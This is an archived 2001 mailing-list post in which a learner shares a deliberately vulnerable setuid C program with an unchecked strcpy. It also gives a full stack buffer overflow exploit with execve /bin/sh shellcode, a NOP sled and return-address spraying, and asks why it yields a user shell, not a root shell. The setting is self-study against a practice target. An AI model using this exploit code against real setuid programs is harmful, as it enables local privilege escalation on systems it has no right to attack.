question on an exploit

From: roland kwitt (sniperat_private)
Date: Thu May 17 2001 - 07:16:13 PDT

  • Next message: Sardaņons, Eliel: "FTP.exe risk:low"

    hi folks,
    
    
    recently i found a very good howto about buffer overflowing
    
    and tried to code an exploit for a little program.
    
    
    #####################
    Prog. to be exploited
    #####################
    
    int main(int argc, char *argv[])
    {
            char buffer[500];
            if(argc>=2) strcpy(buffer, argv[1]);
            return 0;
    }
    
    
    As anybody can see the program does not check the size of the
    
    input copied in buffer. Therefor it should be able to
    
    exploit it and gain root access through spawning a root shell.
    
    The perms of that prog are set to:
    
    418444   16 -rwsr-xr-x   1 root     users       13335 May 17 15:22 vuln
    
    
    The exploit looks like this:
    
    
    
    #include <stdlib.h>
    #include <stdio.h>
    
    #define BUFFERSIZE 600  /* vulnerable buffer + 100 bytes */
    
    char linuxshell[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
    
    "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
                        "\x80\xe8\xde\xff\xff\xff/bin/sh";
    
    unsigned long sp(void)
    {
            __asm__("movl %esp, %eax");
    }
    
    void usage(char *cmd)
    {
            printf("\nusage: %s <offset>\n\n", cmd);
            exit(-1);
    }
    
    int main(int argc, char *argv[])
    {
            int i, offset, os;
            long esp, ret, *addr_ptr;
            char *buffer, *ptr, *osptr;
    
            if(argc<2) usage(argv[0]);
    
            offset = atoi(argv[1]);
            esp    = sp();
            ret    = esp-offset;
    
            printf("Stack pointer: 0x%x\n", esp);
            printf("       Offset: 0x%x\n", offset);
            printf("  Return addr: 0x%x\n", ret);
    
            if(!(buffer = malloc(BUFFERSIZE))) {
                    printf("Couldn't allocate memory.\n");
                    exit(-1);
            }
    
            ptr = buffer;
            addr_ptr = (long *)ptr;
    	for(i=0; i<BUFFERSIZE; i+=4)
                    *(addr_ptr++) = ret;
    
            for(i=0; i<BUFFERSIZE/2; i++)
                    buffer[i] = '\x90';
    
            ptr = buffer + ((BUFFERSIZE/2) - (strlen(linuxshell)/2));
            for(i=0; i<strlen(linuxshell); i++)
                    *(ptr++) = linuxshell[i];
    
    
            buffer[BUFFERSIZE-1] = 0;
            execl("./vuln", "vulnerable", buffer, 0);
    
            return 0;
    }
    
    As a tried to execute the exploit using "exploit 0" (offset)
    
    the only thing i got was an ordinary user shell but not
    
    a root shell. Can somebody tell me why the setuid flag
    
    is ignored!!
    
    
    Thanks, sniper!!
    



    This archive was generated by hypermail 2b30 : Mon May 21 2001 - 08:08:13 PDT